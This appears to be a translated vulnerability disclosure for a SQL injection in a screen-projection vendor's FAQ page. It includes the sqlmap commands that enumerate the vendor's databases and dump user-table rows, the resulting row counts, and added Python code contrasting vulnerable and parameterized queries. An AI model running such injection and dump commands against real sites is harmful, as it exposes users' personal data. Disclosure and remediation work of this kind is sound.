Disclosure timeline:
2016-03-14: Details reported to the vendor, awaiting vendor handling
2016-03-18: Vendor confirmed; details disclosed to the vendor only
2016-03-28: Details disclosed to core white hats and relevant domain experts
2016-04-07: Details disclosed to regular white hats
2016-04-17: Details disclosed to intern white hats
2016-05-02: Details disclosed to the public
Official site description: the world's best screen-projection app, available across multiple platforms, with a user base of over 3 million (300W).
Enumerating databases through the injectable faq parameter with sqlmap:

python sqlmap.py -u "**.**.**.**/help_faq.php?faq=107&l=cn&type=ezcast" --dbs --count
available databases [18]:
[*] backstage
[*] ezcast
[*] ezcastall
[*] ezcastall-20141121-1410
[*] ezcastbbs
[*] frank_phpbb3
[*] information_schema
[*] innodb
[*] miradisplay
[*] mirascreen
[*] mysql
[*] performance_schema
[*] phpbb3
[*] phpbb_auth_iezvu
[*] phpbben
[*] phpmyadmin
[*] testiezvucom
[*] tmp
Database: ezcast (about 380K (38W) users)
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| maxhom_download_log | 511830  |
| maxhom_role_user    | 381503  |
| maxhom_user         | 381485  |
+---------------------+---------+

Database: ezcastall (about 210K (21W) user records)
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| maxhom_download_log | 283471  |
| maxhom_role_user    | 210560  |
| maxhom_user         | 210542  |
+---------------------+---------+

Database: ezcastbbs
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| pre_home_notification             | 58277   |
| pre_ucenter_members               | 57508   |
| pre_ucenter_memberfields          | 57507   |
| pre_common_member_count           | 57500   |
| pre_common_member_profile         | 57500   |
| pre_common_member_status          | 57500   |
| pre_common_member                 | 57499   |
+-----------------------------------+---------+

Database: miradisplay
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| maxhom_download_log | 511772  |
| maxhom_role_user    | 82200   |
| maxhom_attachment   | 5077    |
| maxhom_area         | 3266    |
+---------------------+---------+

Database: mirascreen
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| maxhom_download_log | 511772  |
| maxhom_role_user    | 379964  |
| maxhom_user         | 379946  |
| maxhom_attachment   | 5077    |
+---------------------+---------+
Dumping 10 rows of user data as proof:
python sqlmap.py -u "**.**.**.**/help_faq.php?faq=107&l=cn&type=ezcast" -D mirascreen -T maxhom_user --dump --start 100 --stop 110
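The injectable parameter here is a numeric FAQ id (plus a language code and a product type) that the page evidently pastes into its query. The following is an added illustration, not the vendor's code: a small Python/sqlite3 model of such a lookup, with the unsafe string-building pattern beside a validated, parameterized version. The table layout, column names, sample rows and the faq_lookup_* function names are constructed assumptions.

```python
# Added example modelling the help_faq lookup; not the vendor's code.
# Table layout, column names and rows below are constructed assumptions.
import re
import sqlite3

ALLOWED_TYPES = {"ezcast", "mirascreen", "miradisplay"}  # assumed product types
ALLOWED_LANGS = {"cn", "en"}                             # assumed language codes
FAQ_ID_RE = re.compile(r"[0-9]{1,9}")                    # ASCII digits only


def make_db() -> sqlite3.Connection:
    """Build an in-memory table standing in for the FAQ table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE faq (id INTEGER, lang TEXT, type TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO faq VALUES (?, ?, ?, ?)",
        [
            (107, "cn", "ezcast", "How do I connect?"),
            (108, "cn", "ezcast", "How do I update firmware?"),
            (107, "en", "mirascreen", "How do I connect? (EN)"),
        ],
    )
    return conn


def faq_lookup_vulnerable(conn, faq: str, lang: str, typ: str) -> list:
    """Request parameters spliced straight into the SQL text.

    This is the pattern that lets a tool like sqlmap turn one GET parameter
    into read access over every database the web account can see.
    """
    sql = (f"SELECT body FROM faq WHERE id = {faq} "
           f"AND lang = '{lang}' AND type = '{typ}'")
    return [row[0] for row in conn.execute(sql)]


def faq_lookup_safe(conn, faq: str, lang: str, typ: str) -> list:
    """Validate each parameter against its expected shape, then bind it.

    Even with binding, the allowlists keep unexpected values out of the query
    and give a clean rejection to log instead of a database error.
    """
    if not FAQ_ID_RE.fullmatch(faq):
        raise ValueError("faq must be a positive integer")
    if lang not in ALLOWED_LANGS or typ not in ALLOWED_TYPES:
        raise ValueError("unknown lang or type")
    sql = "SELECT body FROM faq WHERE id = ? AND lang = ? AND type = ?"
    return [row[0] for row in conn.execute(sql, (int(faq), lang, typ))]
```

With the constructed rows, a tautology appended to faq makes the unsafe version return every row, while the safe version refuses the input before it reaches the database.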
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2016-03-18 16:24
CNVD has not directly reproduced the described situation and has not yet established a direct handling channel with the site's administrating organisation; pending claim.
Fix recommendation: none provided.